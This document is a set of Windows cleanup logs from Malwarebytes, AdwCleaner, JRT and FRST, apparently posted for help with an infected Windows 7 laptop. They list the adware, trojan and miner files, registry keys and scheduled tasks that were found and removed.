PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCHASSISTANT, Se reemplazará al reiniciar, 922, 293485, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|DEFAULT_SEARCH_URL, Se reemplazará al reiniciar, 922, 293486, 1.0.21478, , ame, 
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Se reemplazará al reiniciar, 266, 293477, 1.0.21478, , ame, 
Adware.SonicSearch, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, Se reemplazará al reiniciar, 13600, 693611, 1.0.21478, , ame, 

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 8
PUP.Optional.Linkury.ACMB1, C:\PROGRAMDATA\CLOUDPRINTER, Se eliminará al reiniciar, 922, 259506, 1.0.21478, , ame, 
PUP.Optional.CloudNet, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\CSRSS, Se eliminará al reiniciar, 5975, 448845, 1.0.21478, , ame, 
RiskWare.BitCoinMiner, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\WUP, Se eliminará al reiniciar, 855, 512161, 1.0.21478, , ame, 
Adware.Linkury, C:\ProgramData\Logic Cramble\X64, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\X86, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\PROGRAMDATA\LOGIC CRAMBLE, Se eliminará al reiniciar, 424, 431817, 1.0.21478, , ame, 
Trojan.Glupteba.BITSRST, C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet, Se eliminará al reiniciar, 1138, 781247, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\ROAMING\EPICNET INC, Se eliminará al reiniciar, 1138, 781247, 1.0.21478, , ame, 

Archivo: 57
PUP.Optional.Linkury.ACMB1, C:\PROGRAMDATA\CLOUDPRINTER\CLOUDPRINTER.DAT, Se eliminará al reiniciar, 922, 259506, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, C:\ProgramData\CloudPrinter\CloudPrinter.exe, Se eliminará al reiniciar, 922, 259506, , , , 
PUP.Optional.Linkury.ACMB1, C:\ProgramData\CloudPrinter\Config.xml, Se eliminará al reiniciar, 922, 259506, , , , 
PUP.Optional.Linkury.ACMB1, C:\WINDOWS\SYSWOW64\FINDIT.XML, Se eliminará al reiniciar, 922, 259512, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\AGENT.DAT, Se eliminará al reiniciar, 3753, 404872, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\UNINSTALL_TEMP.ICO, Se eliminará al reiniciar, 3753, 404862, 1.0.21478, , ame, 
Trojan.FakeMS, C:\WINDOWS\SYSTEM32\TASKS\SYSTEM\SYSTEMCHECK, Se eliminará al reiniciar, 3119, 414093, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\NOAH.DAT, Se eliminará al reiniciar, 3753, 404865, 1.0.21478, , ame, 
PUP.Optional.CloudNet, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\CSRSS\CLOUDNET.EXE, Se eliminará al reiniciar, 5975, 448845, 1.0.21478, , ame, 
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, Se eliminará al reiniciar, 491, 455564, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\MD.XML, Se eliminará al reiniciar, 3753, 404866, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\Plustech.tst, Se eliminará al reiniciar, 3753, 404871, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\Techsing.tst, Se eliminará al reiniciar, 3753, 404871, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\MAIN.DAT, Se eliminará al reiniciar, 3753, 442900, 1.0.21478, , ame, 
Trojan.Agent, C:\USERS\MARCO AVILA\APPDATA\LOCAL\LOBBY.DAT, Se eliminará al reiniciar, 491, 712637, 1.0.21478, , ame, 
Adware.Linkury, C:\PROGRAMDATA\LOGIC CRAMBLE\SET.EXE, Se eliminará al reiniciar, 424, 379533, , , , 
Trojan.Agent, C:\USERS\MARCO AVILA\APPDATA\LOCAL\APPLICATIONHOSTING.DAT, Se eliminará al reiniciar, 491, 712640, 1.0.21478, , ame, 
RiskWare.BitCoinMiner, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\WUP\WUP.EXE, Se eliminará al reiniciar, 855, 512161, 1.0.21478, , ame, 
Generic.Malware/Suspicious, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TECHSING.EXE, Se eliminará al reiniciar, 0, 392686, 1.0.21478, , shuriken, 
Generic.Malware/Suspicious, C:\USERS\MARCO AVILA\APPDATA\LOCAL\PLUSTECH.EXE, Se eliminará al reiniciar, 0, 392686, 1.0.21478, , shuriken, 
Adware.Linkury, C:\USERS\MARCO AVILA\APPDATA\LOCAL\installer.dat, Se eliminará al reiniciar, 424, 715618, 1.0.21478, , ame, 
Adware.Linkury, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\installer.dat, Se eliminará al reiniciar, 424, 715618, 1.0.21478, , ame, 
Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, Se eliminará al reiniciar, 491, 196479, , , , 
Trojan.Agent, C:\WINDOWS\SYSTEM32\TASKS\csrss, Se eliminará al reiniciar, 491, 196479, , , , 
Adware.Tuto4PC.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\IS-LRH00.TMP\MOULIALEFIL.EXE, Se eliminará al reiniciar, 3712, 667274, , , , 
Generic.Malware/Suspicious, C:\PROGRAMDATA\ERRORRESPONDER\LAOWOWIDOCMEYWA.EXE, Se eliminará al reiniciar, 0, 392686, 1.0.21478, , shuriken, 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\LOCAL\CHROMIUM\APPLICATION\CHROME.EXE, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\ScheduledUpdate, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{025EAD11-7928-4F28-8569-C009EE9DCFED}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{111E94BF-2FBE-4662-8EE2-E722532AD46A}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{31B64B79-FB77-4D0C-9E0A-E7C533D051B9}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{76188DFE-44A0-4E86-B159-FCBB9C714646}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{C7F81ED6-E5AB-4DE6-A61C-1C27DBDDC7F1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\ROAMING\EPICNET INC\CLOUDNET\CLOUDNET.EXE, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.E, C:\WINDOWS\SYSTEM32\DRIVERS\WINMON.SYS, Se eliminará al reiniciar, 494, 781215, 1.0.21478, , ame, 
Trojan.Glupteba.E, C:\WINDOWS\SYSTEM32\DRIVERS\WINMONFS.SYS, Se eliminará al reiniciar, 494, 781211, , , , 
Trojan.Glupteba.E, C:\WINDOWS\SYSTEM32\DRIVERS\WINMONPROCESSMONITOR.SYS, Se eliminará al reiniciar, 494, 781210, , , , 
Trojan.Agent.PrxySvrRST, C:\WINDOWS\SYSTEM32\TASKS\MICROSOFT\WINDOWS\TIME SYNCHRONIZATION\VIEWUTCTIME, Se eliminará al reiniciar, 1171, 784090, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\X64\SQLite.Interop.dll, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\X86\SQLite.Interop.dll, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\Config.json, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\set.exe.config, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\System.Data.SQLite.dll, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\System.Data.SQLite.Linq.dll, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\System.Data.SQLite.xml, Se eliminará al reiniciar, 424, 431817, , , , 
RiskWare.Packed.Themida, C:\PROGRAMDATA\ERRORRESPONDER\ERRORRESPONDER.EXE, Se eliminará al reiniciar, 7487, 804571, 1.0.21478, , ame, 
Adware.Linkury.TskLnk, C:\USERS\MARCO AVILA\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Se eliminará al reiniciar, 14988, 444923, 1.0.21478, , ame, 
Adware.Linkury.TskLnk, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\INSTALLATIONCONFIGURATION.XML, Se eliminará al reiniciar, 14988, 444922, 1.0.21478, , ame, 
HackTool.FilePatch, C:\USERS\MARCO AVILA\APPDATA\ROAMING\MOVAVI VIDEO CONVERTER 19 PREMIUM\PATCH-MOVAVI.VIDEO.CONVERTER.PREMIUM.19.X-ASTRON.EXE, Se eliminará al reiniciar, 7540, 281135, 1.0.21478, , ame, 
PUP.Optional.Carambis, C:\USERS\MARCO AVILA\APPDATA\ROAMING\RVFECDXS.EXE, Se eliminará al reiniciar, 2898, 726630, 1.0.21478, , ame, 
MachineLearning/Anomalous.100%, C:\USERS\MARCO AVILA\APPDATA\ROAMING\ERGFEEFVG.EXE, Se eliminará al reiniciar, 0, 392687, 1.0.21478, , shuriken, 
Spyware.CryptBot.Generic, C:\USERS\MARCO AVILA\APPDATA\ROAMING\RGFWEDWSAX.EXE, Se eliminará al reiniciar, 10525, 800679, 1.0.21478, 000000000000000000000003, dds, 00650839
Adware.Csdimonetize, C:\PROGRAM FILES (X86)\ORCHESTRALE\29515953.EXE, Se eliminará al reiniciar, 2943, 804330, 1.0.21478, 56B52D84717E9D9837697FD1, dds, 00650839
Adware.Csdimonetize, C:\PROGRAM FILES (X86)\MARS\281505898.EXE, Se eliminará al reiniciar, 2943, 804330, 1.0.21478, 56B52D84717E9D9837697FD1, dds, 00650839
Adware.Linkury, C:\USERS\MARCO AVILA\APPDATA\LOCAL\SUNTECH.BIN, Se eliminará al reiniciar, 424, 504848, 1.0.21478, , ame, 
Generic.Malware/Suspicious, C:\WINDOWS\[email protected], Se eliminará al reiniciar, 0, 392686, 1.0.21478, , shuriken, 

Sector físico: 0
(No hay elementos maliciosos detectados)

WMI: 0
(No hay elementos maliciosos detectados)


(end)
# -------------------------------
# Malwarebytes AdwCleaner 8.0.3.0
# -------------------------------
# Build:    03-03-2020
# Database: 2020-03-23.1 (Cloud)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    03-27-2020
# Duration: 00:00:26
# OS:       Windows 7 Home Premium
# Cleaned:  65
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted       C:\Program Files (x86)\Common Files\IObit\Advanced SystemCare V8
Deleted       C:\ProgramData\IObit\Advanced SystemCare V7
Deleted       C:\ProgramData\IObit\Advanced SystemCare V8
Deleted       C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft\WebCompanion
Deleted       C:\Users\ASPNET\AppData\Local\torch
Deleted       C:\Users\Administrador\AppData\Local\torch
Deleted       C:\Users\HomeGroupUser$\AppData\Local\torch
Deleted       C:\Users\Invitado\AppData\Local\torch
Deleted       C:\Users\MARCO AVILA\AppData\LocalLow\IObit\Advanced SystemCare V8
Deleted       C:\Users\MARCO AVILA\AppData\Local\VirtualStore\ProgramData\Speedbit
Deleted       C:\Users\MARCO AVILA\AppData\Roaming\IObit\Advanced SystemCare
Deleted       C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\IObit\Advanced SystemCare V8
Deleted       C:\Windows\rss

***** [ Files ] *****

Deleted       C:\END
Deleted       C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\searchplugins\yahoo-lavasoft.xml

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

Deleted       C:\Windows\System32\Tasks\FreeDownloadManagerNetworkMonitor
Deleted       C:\Windows\System32\Tasks\PRODUCT UPDATER

***** [ Registry ] *****

Deleted       HKCU\Software\Lavasoft\Web Companion
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted       HKCU\Software\PRODUCTSETUP
Deleted       HKCU\Software\ProductSetup\Uninstall\0B2U2Z1P0F1P1G1R1P1V0A1Q1Q0O1G
Deleted       HKCU\Software\ProductSetup\Uninstall\0S1P1T1C1R1MtT0P1C1F2X1L1Q1P1QtT1S2UtT0Y1T1M1F1F
Deleted       HKCU\Software\win
Deleted       HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\Advanced SystemCare
Deleted       HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shellex\ContextMenuHandlers\Advanced SystemCare
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{45BDE75E-7158-40F8-BE0E-4EDAA215FCBF}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{45BDE75E-7158-40F8-BE0E-4EDAA215FCBF}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7D310AAB-358D-447D-BDBB-005B3CD5F610}
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FreeDownloadManagerNetworkMonitor
Deleted       HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Product Updater
Deleted       HKLM\Software\Applian Technologies
Deleted       HKLM\Software\Wow6432Node\Applian Technologies
Deleted       HKLM\Software\Wow6432Node\IObit\RealTimeProtector
Deleted       HKLM\Software\Wow6432Node\Lavasoft\Web Companion

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

Deleted       findit
Deleted       findit

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

Deleted       Preinstalled.AcerIdentityCard   Folder   C:\Program Files (x86)\ACER\IDENTITY CARD
Deleted       Preinstalled.AcerIdentityCard   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Identity Card
Deleted       Preinstalled.AcerPowerManagement   Registry   HKLM\Software\Microsoft\Windows\CurrentVersion\Run|Acer ePower Management
Deleted       Preinstalled.AcerRegistration   Folder   C:\Program Files (x86)\ACER\REGISTRATION
Deleted       Preinstalled.AcerRegistration   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\Acer Registration
Deleted       Preinstalled.AcerUpdater   Folder   C:\Program Files\ACER\ACER UPDATER
Deleted       Preinstalled.AcerUpdater   Folder   C:\ProgramData\ACER\ACER UPDATER
Deleted       Preinstalled.AcerVideoConferenceManager   Folder   C:\Program Files (x86)\ACER\ACER VCM
Deleted       Preinstalled.AcerVideoConferenceManager   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}
Deleted       Preinstalled.GatewayMyBackup   Folder   C:\Program Files (x86)\NEWTECH INFOSYSTEMS
Deleted       Preinstalled.GatewayMyBackup   Folder   C:\Users\MARCO AVILA\AppData\Local\NEWTECH INFOSYSTEMS
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Run|BackupManagerTray
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{12EFA1A4-AC3B-443C-8143-237EDE760403}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{12EFA1A4-AC3B-443C-8143-237EDE760403}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{2413930C-8309-47A6-BC61-5EF27A4222BC}
Deleted       Preinstalled.GatewayMyBackup   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{72B776E5-4530-4C4B-9453-751DF87D9D93}
Deleted       Preinstalled.GatewayWelcomeCenter   File   C:\Users\Administrador.MAAH-PC\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Welcome Center.lnk
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110209593}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110551697}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112662477}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11273477}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112920767}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113786380}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115053100}
Deleted       Preinstalled.PackardBellGamesBundle   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11531173}
Deleted       Preinstalled.PackardBellPowerManagement   Registry   HKLM\Software\Wow6432Node\\Microsoft\Windows\CurrentVersion\Uninstall\{3DB0448D-AD82-4923-B305-D001E521A964}


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [8676 octets] - [27/03/2020 19:21:26]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.4 (07.09.2017)
Operating System: Windows 7 Home Premium x64 
Ran by MARCO AVILA (Administrator) on 27/03/2020 at 19:33:15.02
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 34 

Successfully deleted: C:\ProgramData\ammyy (Folder) 
Successfully deleted: C:\ProgramData\mntemp (File) 
Successfully deleted: C:\ProgramData\productdata (Folder) 
Successfully deleted: C:\ProgramData\thunder network (Folder) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\{01472ADB-0FB8-471C-AEDB-F3668BFFD94A} (Empty Folder)
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\{20236B20-D01C-425C-A488-5B35C313E850} (Empty Folder)
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\{2D905F79-1589-4D17-946D-CB9F79964697} (Empty Folder)
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\{3453B006-420F-47DE-A9BB-1E822A83CB5B} (Empty Folder)
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\{35618DC1-BD85-4B5C-8EA3-36D76AF6C4B6} (Empty Folder)
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\{ACC52816-33BB-4EB4-B7DC-977EADD11499} (Empty Folder)
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\{CC108CCD-5BA5-4724-B068-20CDE6DA4215} (Empty Folder)
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\{F2018467-CF36-4AA3-BE4D-7ED568A9964A} (Empty Folder)
Successfully deleted: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\extensions\staged (Folder) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ueamuf4c.default\user.js (File) 
Successfully deleted: C:\Users\Public\thunder network (Folder) 
Successfully deleted: C:\Windows\system32\Tasks\Erocketing Disk Software (Task)
Successfully deleted: C:\Windows\system32\Tasks\Uninstaller_SkipUac_MARCO_AVILA (Task)
Successfully deleted: C:\Windows\wininit.ini (File) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3BA0CDFD (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5OGUGW77 (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9U4TX4KB (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AG75DH50 (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I475J611 (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JX2CYNQ5 (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OPIHWN8Q (Temporary Internet Files Folder) 
Successfully deleted: C:\Users\MARCO AVILA\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PSLUGGQS (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\3BA0CDFD (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5OGUGW77 (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9U4TX4KB (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\AG75DH50 (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I475J611 (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JX2CYNQ5 (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OPIHWN8Q (Temporary Internet Files Folder) 
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PSLUGGQS (Temporary Internet Files Folder) 



Registry: 3 

Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{C0C3A6C6-03BC-4195-8FCB-AEA091301353} (Registry Key)
Successfully deleted: HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{13D67BB7-DB5F-48AA-884D-7A5D94168509} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{13D67BB7-DB5F-48AA-884D-7A5D94168509} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 27/03/2020 at 19:41:26.53
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x64) Versión: 26-03-2020
Ejecutado por MARCO AVILA (administrador) sobre MAAH-PC (Acer Aspire 4810T) (27-03-2020 19:42:46)
Ejecutado desde C:\Users\MARCO AVILA\Desktop
Perfiles cargados: MARCO AVILA (Perfiles disponibles: MARCO AVILA & Administrador)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Idioma: Español (España, internacional)
Internet Explorer Versión 11 (Navegador predeterminado: FF)
Modo de Inicio: Normal
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesos (Lista blanca) =================

(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

() [Archivo no firmado] C:\Windows\[email protected]
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe
(Acer Incorporated -> Acer Incorporated) C:\Program Files\Acer\Optical Drive Power Management\ODDPWRSvc.exe
(Dritek System Inc. -> Dritek System Inc.) C:\Program Files (x86)\Launch Manager\dsiwmis.exe
(EGIS TECHNOLOGY INC. -> Egis Technology Inc.) C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\MWLService.exe
(Fine Point Technologies, Inc.) [Archivo no firmado] C:\Program Files (x86)\Asistente Infinitum\IsaMonitor.exe
(Intel Corporation -> Intel Corporation) C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\IAANTmon.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\msftesql.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) C:\Windows\System32\hkcmd.exe
